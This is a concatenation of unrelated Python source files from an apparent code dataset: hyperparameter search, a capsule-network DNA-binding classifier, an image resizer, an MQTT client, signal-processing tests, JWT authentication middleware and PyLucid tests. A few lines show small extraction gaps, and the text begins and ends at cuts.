'min_child_weight': int(np.random.choice(np.linspace(1, 7, 7))),\n 'reg_alpha': np.random.choice(np.concatenate([np.linspace(0, 1, 101), np.linspace(2, 100, 99)]).round(2)),\n 'reg_lambda': np.random.choice(np.concatenate([np.linspace(0, 1, 101), np.linspace(2, 100, 99)]).round(2)),\n 'subsample': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'colsample_bytree': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'colsample_bylevel': np.random.choice(np.linspace(0.5, 1, 6)).round(1),\n 'gamma': np.random.choice(np.linspace(0, 0.6, 13)).round(0),\n 'max_delta_step': int(np.random.choice(np.linspace(0, 10, 11))),\n 'scale_pos_weight': int(np.random.choice(np.linspace(1, weight, weight))),\n 'n_jobs':n_job, 'random_state': 27, 'objective': 'rank:pairwise', 'tree_method':tree_method}\n model = xgb.XGBRanker(**params)\n score = []\n if speedy:\n for _ in range(cv_num):\n X_train, X_test, y_train, y_test, g_train, g_test = train_test_split(feature, label, group, \n test_size=test_size, stratify=label, \n random_state=np.random.choice(range(100), 1)[0])\n model.fit(X_train, y_train, g_train)\n cv_pred = model.predict(X_test)\n score.append(metrics(y_test.values, cv_pred))\n else:\n skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=np.random.choice(range(100), 1)[0])\n for n, (train_index, test_index) in enumerate(skf.split(feature, label)):\n if n == cv_num:\n break\n model.fit(feature.loc[train_index], label[train_index], group[train_index])\n cv_pred = model.predict(feature.loc[test_index])\n score.append(metrics(label[test_index].values, cv_pred))\n cv_score = round(np.mean(score), 4)\n if metrics_min:\n if cv_scorescoring:\n scoring = cv_score\n best_params = params.copy()\n sys.stdout.write(\"XGBRanker random search percent: {}%, run time {} min, best score: {}, best param:{}\\r\".format(\n round(i/iter_num*100,2), divmod((time.time()-start),60)[0], scoring, best_params))\n sys.stdout.flush()\n print(\"XGBRanker param finetuning with random search run time: %d min %.2f s\" % divmod((time.time() - start), 60))\n return best_params\n","sub_path":"linora/param_search/XGBRanker/_RandomSearch.py","file_name":"_RandomSearch.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"352616018","text":"import sys\nfrom struct import unpack\nmin = int(sys.argv[1])\nmax = int(sys.argv[2])\nlng = int(sys.argv[3])\nhash = [0] * lng\nwhile True:\n o = sys.stdin.read(4)\n if not len(o) == 4:\n break\n n = unpack(\"I\",o)[0]\n if (n >= min) and (n < max):\n i = int((lng*(n-min)/(float(max)-float(min))))\n hash[i] = (hash[i] + 1) % 10\n\nfor u in range(lng):\n sys.stdout.write(\"%s\" %(hash[u]))\nsys.stdout.write(\"\\n\")","sub_path":"radio/radiohash.py","file_name":"radiohash.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"80790644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 20:42:03 2020\n\n@author: lwzjc\n\"\"\"\nimport numpy as np\nfrom tensorflow.keras import layers, models, optimizers\nfrom tensorflow.keras import backend as K\nimport tensorflow as tf\nfrom tensorflow.keras import callbacks\n#from keras.utils import to_categorical\nfrom Capsule import CapsuleLayer, PrimaryCap, Length, Mask\nfrom sklearn.metrics import accuracy_score, matthews_corrcoef,confusion_matrix\nfrom sklearn.utils import class_weight, shuffle, resample\n\n\ndef CapsNet(input_shape, n_class, num_routing, kernel_size=7):\n \"\"\"\n A Capsule Network on PDNA-543.\n :param input_shape: data shape, 3d, [width, height, channels],for example:[21,28,1]\n :param n_class: number of classes\n :param num_routing: number of routing iterations\n :return: A Keras Model with 2 inputs and 2 outputs\n \"\"\"\n x = layers.Input(shape=input_shape)\n\n # Layer 1: Just a conventional Conv2D layer\n conv1 = layers.Conv2D(filters=128, kernel_size=kernel_size, strides=1, padding='valid', activation='relu', name='conv1')(x)\n # Layer 2: Conv2D layer with `squash` activation, then reshape to [None, num_capsule, dim_vector]\n primarycaps = PrimaryCap(conv1, dim_vector=16, n_channels=32, kernel_size=kernel_size, strides=2, padding='valid')\n\n # Layer 3: Capsule layer. Routing algorithm works here.\n digitcaps = CapsuleLayer(num_capsule=n_class, dim_vector=32, num_routing=num_routing, name='digitcaps')(primarycaps)\n\n # Layer 4: This is an auxiliary layer to replace each capsule with its length. Just to match the true label's shape.\n # If using tensorflow, this will not be necessary. :)\n out_caps = Length(name='out_caps')(digitcaps)\n \n # Decoder network.\n y = layers.Input(shape=(n_class,))\n masked = Mask()([digitcaps, y]) # The true label is used to mask the output of capsule layer.\n x_recon = layers.Dense(512, activation='relu')(masked)\n x_recon = layers.Dense(1024, activation='relu')(x_recon)\n x_recon = layers.Dense(np.prod(input_shape), activation='sigmoid')(x_recon)\n x_recon = layers.Reshape(target_shape=input_shape, name='out_recon')(x_recon)\n\n # two-input-two-output keras Model\n return models.Model([x, y], [out_caps, x_recon])\n \n\ndef semisup_margin_loss(y_true, y_pred): \n m = K.sum(y_true, axis=-1)\n #return K.switch(K.equal(K.sum(y_true), 0), 0., K.sum(K.categorical_crossentropy(K.tf.boolean_mask(y_true,m), K.tf.boolean_mask(y_pred,m), from_logits=True)) / K.sum(y_true))\n t = tf.boolean_mask(y_true,m)\n p = tf.boolean_mask(y_pred,m)\n L = t * K.square(K.maximum(0.,0.9 - p)) + \\\n 0.5 * (1 - t) * K.square(K.maximum(0., p - 0.1))\n return K.switch(K.equal(K.sum(y_true), 0), 0., K.mean(K.sum(L, 1)))\n\ndef margin_loss(y_true, y_pred):\n \"\"\"\n Margin loss for Eq.(4). When y_true[i, :] contains not just one `1`, this loss should work too. Not test it.\n :param y_true: [None, n_classes]\n :param y_pred: [None, num_capsule]\n :return: a scalar loss value.\n \"\"\"\n L = y_true * K.square(K.maximum(0., 0.9 - y_pred)) + \\\n 0.5 * (1 - y_true) * K.square(K.maximum(0., y_pred - 0.1))\n\n return K.mean(K.sum(L, 1))\n\n\ndef train(model, data, args):\n \"\"\"\n Training a CapsuleNet\n :param model: the CapsuleNet model\n :param data: a tuple containing training and testing data, like `((x_train, y_train), (x_test, y_test))`\n :param args: arguments\n :return: The trained model\n \"\"\"\n # unpacking the data\n (x_train, y_train), (x_test, y_test) = data\n\n # callbacks\n log = callbacks.CSVLogger(args.save_dir + '/log.csv')\n tb = callbacks.TensorBoard(log_dir=args.save_dir + '/tensorboard-logs',\n batch_size=args.batch_size, histogram_freq=args.debug)\n checkpoint = callbacks.ModelCheckpoint(args.save_dir + '/weights-{epoch:02d}.h5',\n save_best_only=True, save_weights_only=True, verbose=1)\n lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.lr * (0.9 ** epoch))\n\n # compile the model\n \"\"\"\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\n loss=[margin_loss, 'mse'],\n loss_weights=[1., args.lam_recon],\n metrics={'out_caps': mcc})\n \"\"\"\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\n loss=[semisup_margin_loss,'mse'],\n loss_weights=[1., args.lam_recon],\n metrics={'out_caps': \"accuracy\"})\n \n # Training without data augmentation:\n \n model.fit([x_train, y_train], [y_train, x_train], \n batch_size=args.batch_size, \n epochs=args.epochs,\n validation_data=[[x_test, y_test], [y_test, x_test]], \n callbacks=[log, tb, checkpoint, lr_decay])\n \"\"\"\n #cw = class_weight.compute_class_weight('balanced',np.unique(y_train), y_train)\n #cw = dict(enumerate(cw))\n model.fit(x_train, y_train, batch_size=args.batch_size, \n epochs=args.epochs,\n validation_data=[x_test, y_test], \n #class_weight=cw,\n callbacks=[log, tb, checkpoint, lr_decay])\n \"\"\"\n \"\"\"\n # Begin: Training with data augmentation ---------------------------------------------------------------------#\n def train_generator(x, y, batch_size, shift_fraction=0.):\n train_datagen = ImageDataGenerator(width_shift_range=shift_fraction,\n height_shift_range=shift_fraction) # shift up to 2 pixel for MNIST\n generator = train_datagen.flow(x, y, batch_size=batch_size)\n while 1:\n x_batch, y_batch = generator.next()\n yield ([x_batch, y_batch], [y_batch, x_batch])\n\n # Training with data augmentation. If shift_fraction=0., also no augmentation.\n model.fit_generator(generator=train_generator(x_train, y_train, args.batch_size, args.shift_fraction),\n steps_per_epoch=int(y_train.shape[0] / args.batch_size),\n epochs=args.epochs,\n validation_data=[[x_test, y_test], [y_test, x_test]],\n callbacks=[log, tb, checkpoint, lr_decay])\n # End: Training with data augmentation -----------------------------------------------------------------------#\n \"\"\"\n model.save_weights(args.save_dir + '/trained_model.h5')\n print('Trained model saved to \\'%s/trained_model.h5\\'' % args.save_dir)\n\n from utils import plot_log\n plot_log(args.save_dir + '/log.csv', show=True)\n\n return model\n\n\ndef test(model, data):\n x_test, y_test = data\n y_pred, x_recon = model.predict([x_test, y_test], batch_size=100)\n print('-'*50)\n y_p = np.argmax(y_pred, 1)\n y_t = np.argmax(y_test,1)\n print('Test Accuracy:', accuracy_score(y_t, y_p))\n print('Test mattews-corrcoef', matthews_corrcoef(y_t, y_p))\n return y_p\n \"\"\"\n import matplotlib.pyplot as plt\n from utils import combine_images\n from PIL import Image\n\n img = combine_images(np.concatenate([x_test[:50],x_recon[:50]]))\n image = img * 255\n Image.fromarray(image.astype(np.uint8)).save(\"real_and_recon.png\")\n print()\n print('Reconstructed images are saved to ./real_and_recon.png')\n print('-'*50)\n plt.imshow(plt.imread(\"real_and_recon.png\", ))\n plt.show()\n \"\"\"\n\ndef load_PDNA543_accXiaoInfo():\n from dataset543 import gen_PDNA543_accXiaoInfo\n testdatafile = 'PDNA543TEST_seqs_11.npz'\n traindatafile = 'PDNA543_seqs_11.npz'\n x_train_pos, x_train_neg = gen_PDNA543_accXiaoInfo(traindatafile)\n x_test_pos, x_test_neg = gen_PDNA543_accXiaoInfo(testdatafile)\n \n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n x_neg = resample(x_train_neg, n_samples=x_train_pos.shape[0], replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0], 1] = 1\n y_train[x_train_pos.shape[0]:, 0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train,y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train), (x_test, y_test)\n\ndef load_PDNA543_hhm():\n from dataset543 import gen_PDNA543_HHM,readPDNA543_hhm_sites\n \n (train_hhm, train_sites), (test_hhm, test_sites) = readPDNA543_hhm_sites()\n testdatafile = 'PDNA543TEST_HHM_15.npz'\n traindatafile = 'PDNA543_HHM_15.npz'\n x_test_pos, x_test_neg = gen_PDNA543_HHM(test_hhm, test_sites, testdatafile, ws=15)\n data = np.load(testdatafile, allow_pickle='True')\n x_test_pos, x_test_neg = data['pos'], data['neg']\n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n x_train_pos, x_train_neg = gen_PDNA543_HHM(train_hhm, train_sites, traindatafile, ws=15)\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n x_neg = resample(x_train_neg, n_samples=x_train_pos.shape[0], replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0],1] = 1\n y_train[x_train_pos.shape[0]:,0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train), (x_test, y_test)\n\ndef load_test(testdatafile):\n data = np.load(testdatafile, allow_pickle='True')\n x_test_pos, x_test_neg = data['pos'], data['neg'] \n x_test = np.concatenate((x_test_pos, x_test_neg))\n y_test = np.zeros((x_test.shape[0],2))\n y_test[:x_test_pos.shape[0], 1] = 1\n y_test[x_test_pos.shape[0]:,0] = 1\n x_test = x_test.reshape(-1, x_test.shape[1], x_test.shape[2], 1).astype('float32')\n \n return (x_test, y_test)\n\ndef load_resampleTrain(traindatafile, neg_samples=0):\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n if neg_samples == 0:\n neg_samples = x_train_pos.shape[0]\n x_neg = resample(x_train_neg, n_samples=neg_samples, replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0],2))\n y_train[:x_train_pos.shape[0],1] = 1\n y_train[x_train_pos.shape[0]:,0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train)\n\ndef load_semisupTrain(traindatafile, neg_samples=0):\n data = np.load(traindatafile, allow_pickle='True')\n x_train_pos, x_train_neg = data['pos'], data['neg']\n if neg_samples == 0:\n neg_samples = x_train_pos.shape[0]\n x_neg = resample(x_train_neg, n_samples=neg_samples, replace=False)\n x_train = np.concatenate((x_train_pos, x_neg))\n y_train = np.zeros((x_train.shape[0], 2))\n y_train[:x_train_pos.shape[0], 1] = 1\n y_train[x_train_pos.shape[0] : 3 * x_train_pos.shape[0], 0] = 1\n x_train = x_train.reshape(-1, x_train.shape[1], x_train.shape[2], 1).astype('float32')\n x_train, y_train = shuffle(x_train, y_train)\n \n return (x_train, y_train)\n\"\"\"\ndef load_PDNA543_hhm_xiaoInfo():\n from dataset543 import gen_PDNA543_accXiaoInfo\n from dataset543 import gen_PDNA543_HHM,readPDNA543_hhm_sites\n\"\"\"\nif __name__ == \"__main__\":\n #import numpy as np\n import os\n #from keras.preprocessing.image import ImageDataGenerator\n #from keras.utils.vis_utils import plot_model\n\n # setting the hyper parameters\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', default=100, type=int)\n parser.add_argument('--epochs', default=15, type=int)\n parser.add_argument('--lam_recon', default=0.465, type=float) # 784 * 0.0005, paper uses sum of SE, here uses MSE\n parser.add_argument('--num_routing', default=9, type=int) # num_routing should > 0\n parser.add_argument('--shift_fraction', default=0.1, type=float)\n parser.add_argument('--debug', default=0, type=int) # debug>0 will save weights by TensorBoard\n parser.add_argument('--save_dir', default='./result/PDNA-543')\n parser.add_argument('--is_training', default=1, type=int)\n parser.add_argument('--weights', default=None)\n parser.add_argument('--lr', default=0.001, type=float)\n args = parser.parse_args()\n print(args)\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n \n # load data\n #(x_train, y_train), (x_test, y_test) = load_PDNA543_hhm()\n traindatafile = '../PDNA543_HHM_11.npz'\n testdatafile = '../PDNA543TEST_HHM_11.npz' \n N = 9345*4\n (x_train, y_train) = load_semisupTrain(traindatafile,N)\n (x_test, y_test) = load_test(testdatafile)\n \n y_pred = np.zeros(shape=(y_test.shape[0],))\n ker=[3,5,7,9,11]\n for k in range(len(ker)):\n \n print(\"predictor No.{}:x_train.shape:{}\".format(k, x_train.shape))\n # define model\n model = CapsNet(input_shape=x_train.shape[1:],\n n_class=len(np.unique(np.argmax(y_train, 1))),\n num_routing=args.num_routing, kernel_size=ker[k])\n model.summary()\n #plot_model(model, to_file=args.save_dir+'/model.png', show_shapes=True)\n \n train(model=model, data=((x_train, y_train), (x_test, y_test)), args=args)\n \n y_p = test(model=model, data=(x_test, y_test))\n y_pred = y_pred + y_p\n K.clear_session()\n tf.reset_default_graph()\n #(x_train, y_train), (x_test, y_test) = load_PDNA543_hhm()\n (x_train, y_train) = load_semisupTrain(traindatafile,N)\n \n y_pred = y_pred/len(ker)\n y_p = (y_pred>0.5).astype(float)\n y_t = np.argmax(y_test,1)\n print('Test Accuracy:', accuracy_score(y_t, y_p))\n print('Test mattews-corrcoef', matthews_corrcoef(y_t, y_p))\n print('Test confusion-matrix', confusion_matrix(y_t, y_p))\n \"\"\"\n # train or test\n if args.weights is not None: # init the model weights with provided one\n model.load_weights(args.weights)\n if args.is_training:\n train(model=model, data=((x_train, y_train), (x_test, y_test)), args=args)\n else: # as long as weights are given, will run testing\n if args.weights is None:\n print('No weights are provided. Will test using random initialized weights.')\n test(model=model, data=(x_test, y_test))\n \"\"\"","sub_path":"bak/capsnet543.py","file_name":"capsnet543.py","file_ext":"py","file_size_in_byte":14797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"375586598","text":"import obraz,os,glob,Image\ntry:\n from urllib.request import pathname2url, url2pathname\nexcept ImportError:\n from urllib import pathname2url, url2pathname\n\ndef resize_jpg(basedir, destdir, site):\n\t\"\"\"Resizing large .jpgs in /attach dir.\"\"\"\n\t#should use url2pathname when opening files!\n\t\n\tattach_dir = glob.glob(os.getcwd() + '/attach/' + '*.jpg') + glob.glob(os.getcwd() + '/attach/' + '*.JPG')\n\t\n\tfor image in attach_dir:\n\t\tim = Image.open(image)\n\t\tw,h = im.size\t\t\t\t\t\t#Get image width and height\n\t\tif min(w,h)>2048:\t\t\t\t\t#Check if either dimension is smaller than 2048\n\t\t\tim.thumbnail((2048,2048), Image.ANTIALIAS)\t#Re-size Image\n\t\t\tw,h = im.size\t\t\t\t\t#update image size\n\t\t\tim.save(image, \"JPEG\")\n\nobraz.processors.insert(0, resize_jpg)","sub_path":"resizejpg.py","file_name":"resizejpg.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"399838789","text":"import paho.mqtt.client as mqtt\nimport time\n\n# CALLBACK FUNCTIONS\ndef on_log(client, userdata, level, buf):\n print(\"log: \"+buf)\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\n\ndef on_disconnect(client, userdata, flags, rc=0):\n print(\"Disconnected result code \"+str(rc))\n\ndef on_message(client,userdata,msg):\n topic=msg.topic\n m_decode=str(msg.payload.decode(\"utf-8\", \"ignore\"))\n print(\"Message received\",m_decode)\n print(\"Topic: \"+str(topic))\n\n# Set up CONNECTION VARIABLES\n# Set IP address of broker\n# broker = \"localhost\"\n# broker = \"test.mosquitto.org\"\nport = 1883\nbroker=\"169.254.238.24\"\n# broker=\"pi.local\"\n\n# Name the client within the arguement\nclient = mqtt.Client(\"Zy\")\n\n# Binding all callback functions\nclient.on_connect=on_connect\nclient.on_disconnect=on_disconnect\nclient.on_log=on_log\nclient.on_message=on_message\n\n# Setting up connection to the broker\nprint(\"Connecting to broker: \",broker)\nclient.connect(broker,port)\n\n# Loop needed for callback to work\nclient.loop_start()\n\n\n# SUBSCRIBE CODE\nclient.subscribe(\"smell123\")\n\nwhile(True):\n# PUBLISH CODE \n# ARGS:(topic, message)\n time.sleep(4)\n\n\n\nclient.loop_stop\nclient.disconnect()","sub_path":"extra_files/mqttSubscriber.py","file_name":"mqttSubscriber.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"5650531","text":"# Authors: Lukas Gemein \n#\n# License: BSD-3\n\nimport numpy as np\nimport pytest\n\nfrom braindecode.datautil.signalproc import (\n exponential_running_demean, exponential_running_standardize)\n\n\n@pytest.fixture(scope=\"module\")\ndef mock_data():\n np.random.seed(20200217)\n mock_input = np.random.rand(2, 10).reshape(2, 10)\n expected_standardized = np.array(\n [[ 0. , -1.41385996, -1.67770482, 1.95328935, 0.61618697,\n -0.55294099, -1.08890304, 1.04546089, -1.368485 , -1.08669994],\n [ 0. , -1.41385996, -0.41117774, 1.65212819, -0.5392431 ,\n -0.23009334, 0.15087203, -1.45238971, 1.88407553, -0.38583499]])\n expected_demeaned = np.array(\n [[ 0. , -0.02547392, -0.10004415, 0.47681459, 0.1399319 ,\n -0.11764405, -0.23535964, 0.22749205, -0.3155749 , -0.25316515],\n [ 0. , -0.29211105, -0.07138808, 0.44137798, -0.13274718,\n -0.0519248 , 0.03156507, -0.33137195, 0.52134583, -0.1020266 ]])\n return mock_input, expected_standardized, expected_demeaned\n\n\ndef test_exponential_running_standardize(mock_data):\n mock_input, expected_data, _ = mock_data\n standardized_data = exponential_running_standardize(mock_input)\n assert mock_input.shape == standardized_data.shape == expected_data.shape\n np.testing.assert_allclose(\n standardized_data, expected_data, rtol=1e-4, atol=1e-4)\n\n\ndef test_exponential_running_demean(mock_data):\n mock_input, _, expected_data = mock_data\n demeaned_data = exponential_running_demean(mock_input)\n assert mock_input.shape == demeaned_data.shape == expected_data.shape\n np.testing.assert_allclose(\n demeaned_data, expected_data, rtol=1e-4, atol=1e-4)\n\n\ndef test_exponential_running_init_block_size(mock_data):\n mock_input, _, _ = mock_data\n init_block_size = 3\n standardized_data = exponential_running_standardize(\n mock_input, init_block_size=init_block_size)\n np.testing.assert_allclose(\n standardized_data[:, :init_block_size].sum(), [0], rtol=1e-4, atol=1e-4)\n\n demeaned_data = exponential_running_demean(\n mock_input, init_block_size=init_block_size)\n np.testing.assert_allclose(\n demeaned_data[:, :init_block_size].sum(), [0], rtol=1e-4, atol=1e-4)\n","sub_path":"test/unit_tests/datautil/test_signalproc.py","file_name":"test_signalproc.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593085726","text":"\nimport falcon\nimport utils\nfrom jose import jwt\nfrom jose.exceptions import JWTError\nfrom config import TOKEN_SECRET\nfrom config import TOKEN_ALGORITHM\nfrom datetime import datetime\n\nfrom model.business import BusinessModel\n\nclass TokenVerifier(object):\n\n def process_request(self, req, resp):\n freePaths = [\n \"/login-POST\",\n ]\n pathWithMethod = (req.path + \"-\" + req.method)\n\n if pathWithMethod in freePaths:\n return\n\n if req.auth is None or req.auth == '':\n raise utils.makeHttpStatus(200, \"TokenRequired\")\n\n try:\n result = jwt.decode(\n req.auth,\n TOKEN_SECRET,\n algorithms=[TOKEN_ALGORITHM])\n\n if 'expired_date' not in result:\n raise utils.makeHttpStatus(200, \"TokenInvalid\")\n\n today = datetime.now()\n expiredDate = datetime.utcfromtimestamp(result['expired_date'])\n if today > expiredDate:\n raise utils.makeHttpStatus(200, \"TokenExpired\")\n\n req.context[\"id_user\"] = result[\"id\"]\n req.context[\"role\"] = result[\"role\"]\n req.context[\"id_business\"] = result[\"id_business\"]\n\n except JWTError as ex:\n raise utils.makeHttpStatus(200, \"TokenInvalid\")\n","sub_path":"src/resources/tokenverifier.py","file_name":"tokenverifier.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228477300","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\n PyLucid unittests\n ~~~~~~~~~~~~~~~~~\n \n :copyleft: 2010 by the PyLucid team, see AUTHORS for more details.\n :license: GNU GPL v3 or above, see LICENSE for more details.\n\"\"\"\n\nimport os\n\nif __name__ == \"__main__\":\n # run all unittest directly\n os.environ['DJANGO_SETTINGS_MODULE'] = \"pylucid_project.settings\"\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import AnonymousUser\n\nfrom pylucid_project.tests.test_tools import basetest\nfrom pylucid_project.apps.pylucid.models import PageTree, PageContent\nfrom pylucid_project.apps.pylucid.markup import MARKUP_HTML\n\n\nclass GenericTest(basetest.BaseLanguageTestCase):\n \"\"\"\n inherited from BaseUnittest:\n - initial data fixtures with default test users\n - self.login()\n \n inherited from BaseLanguageTest:\n - self.default_language - system default Language model instance (default: en instance)\n - self.default_language - alternative language code than system default (default: 'de')\n - self.other_language - alternative Language mode instance (default: de instance)\n - assertContentLanguage() - Check if response is in right language\n \"\"\"\n def _pre_setup(self, *args, **kwargs):\n super(GenericTest, self)._pre_setup(*args, **kwargs)\n\n pagetree = PageTree.objects.get_root_page(user=AnonymousUser())\n self.pagecontent = PageContent.objects.get(\n pagemeta__pagetree=pagetree, pagemeta__language=self.default_language\n )\n self.pagecontent.markup = MARKUP_HTML\n self.url = self.pagecontent.get_absolute_url()\n\n def setUp(self):\n self.old_DEBUG = settings.DEBUG\n settings.DEBUG = True\n\n def tearDown(self):\n settings.DEBUG = self.old_DEBUG\n\n def _set_content(self, text):\n self.pagecontent.content = (\n \"%(pre)s
\\n\"\n \"%(text)s\\n\"\n \"%(post)s
\"\n ) % {\n \"pre\": \"*\" * 80,\n \"text\": text,\n \"post\": \"^\" * 80,\n }\n self.pagecontent.save()\n\n def _test(self, lucidtag, must_contain):\n self._set_content(lucidtag)\n response = self.client.get(self.url)\n self.assertResponse(response,\n must_contain=must_contain,\n must_not_contain=(\n \"Traceback\", \"XXX INVALID TEMPLATE STRING\",\n \"Form errors\", \"field is required\",\n )\n )\n\n def test_youtube_basic(self):\n self._test(\n '{% lucidTag generic.youtube id=\"-VideoID-\" %}',\n must_contain=(\n '